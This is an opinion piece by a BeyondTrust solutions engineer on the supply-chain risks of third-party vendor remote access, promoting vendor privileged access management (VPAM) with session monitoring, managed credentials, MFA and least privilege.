Our conversations with other companies concerning security often break into a series of cautionary case studies. In these cases, and many others too numerous to mention, the supply-chain attack is evident.
Supply-chain attacks pose such a headache for CISOs because they can originate outside of organisations’ domains, with third parties. Consultants, contractors, and vendors dip in and out of their clients’ digital estates via remote connections. Such activity is routine, frequent, and often lacks the visibility security teams need to retain control. For example, vendors may use methods like VPNs (virtual private networks), which can circumvent the security policies of the client organisation.
Willful or ignorant misuse by third parties can introduce risk. And that risk may not always be apparent. In a recent PwC survey, less than half of security leaders in the United Arab Emirates (UAE) said they had a good understanding of the risks posed to their organisation by vendors. And the complexities of post-Covid technology stacks may exacerbate this visibility problem. When not bound by policy, credentials may be weak. Access may be shared. Passwords may be reused. And former employees of the vendor may misuse orphaned accounts.
The way forward: VPAM
How then should we manage vendor access considering they could be the weakest link in the security chain? Privileged access for third parties may be necessary to the smooth running of the business, but that should not require security leaders to make exceptions to policy. The solution? Vendor privileged access management (VPAM), which allows third parties to connect to the corporate environment by subjecting them to the same privileged access management (PAM) best practices that are applied internally.
VPAM extends existing technologies found in Privileged Access Management (PAM) and unifies them with secure remote access and zero trust. It uses the cloud to ensure privileged remote access occurs wherever the client organisation has assets (platforms, infrastructure, or applications) that require vendor support. VPAM solutions are designed to account for weaker security among vendors and protect against account compromise, lateral movement, privilege escalation, and payload delivery. Least privilege, continuous authentication, and many other ZTA (zero-trust security architecture) requirements are also present.
VPAM allows implementation of many identity-management best practices. The five main ones follow.
Visibility
VPAM enables organisations to maintain a live inventory of vendors, onboard new ones quickly, and account for all access to systems. As vendor sessions are instantiated, they are monitored. And every action — from keystrokes to commands entered — is recorded and indexed for ease of searching. The result is a rich archive of information that management tools can use to help identify compromise of a vendor’s credentials. Where risk is discovered, VPAM allows the imposition of additional layers of security for the compromised account or, where necessary, the ability to revoke access.
Control
For all inbound access, VPAM monitors and logs authentication, and has full visibility into all transactions that take place within authorised sessions. This gives back control of third-party access to organisations and allows them to have greater insight of the entire risk tree, from root to branch.
Credential management
VPAM recognises the inherent risk of granting direct access to vendors through passwords. Instead, it embeds managed credentials to initiate remote sessions. Third-party end users never see these credentials and the VPAM solution allows security teams to control what happens after they are used — stored for reuse or changed after each session, depending on the sensitivity of the access they grant.
Multi-factor authentication (MFA)
While imperfect as a security catchall, multi-factor authentication still constitutes a security best practice for remote access. MFA can act as an effective safeguard against credential theft, and its presence in VPAM is standard.
Least privilege
The best practice of granting only those privileges required to do a job (and no more) is an integral part of PAM and VPAM. This style of credentials provision for third parties, coupled with just-in-time access — where provision occurs only when work is to be carried out and is withdrawn when work is completed, or shortly thereafter — ensures a state of zero standing privileges (ZSP).
The ideal platform
For regional organisations looking to become digital businesses, privileged remote access is likely unavoidable. But what is needed to remain protected from threat actors is a holistic set of VPAM capabilities that secure vendor identities and remote access. Such a platform will be necessary for regional stakeholders to ensure compliance with an array of government regulations and industry standards.
At the very least, the VPAM solution should secure remote connections and network access without requiring firewall changes. It should allow control that is granular enough for the enterprise to define permissions for every session; and it should grant proxy access to RDP, SSH, cloud instances, and Windows, Unix, and Linux applications.
Password management and built-in MFA should be present, along with the ability to inject hidden credentials directly into remote-access sessions. Passwords and SSH keys should be regularly cycled, and least-privilege should combine with JIT provisioning to add extra layers of safety. Diligent monitoring of every session activity should be searchable and comprehensive enough to support thorough auditing and forensics. And the VPAM platform should allow security teams to spot suspicious sessions easily and isolate them for further action, whether it be locking or termination.
Vendors are a way of life. And vendors hopping in and out of client networks is likely a permanent fixture of digital life, certainly in the B2B space. We must adapt, and VPAM allows us to do that without appreciable compromise to business operations, vendor agility or security. For that reason alone, it is the future of identity management.
Layale Hachem is a senior solutions engineer at BeyondTrust
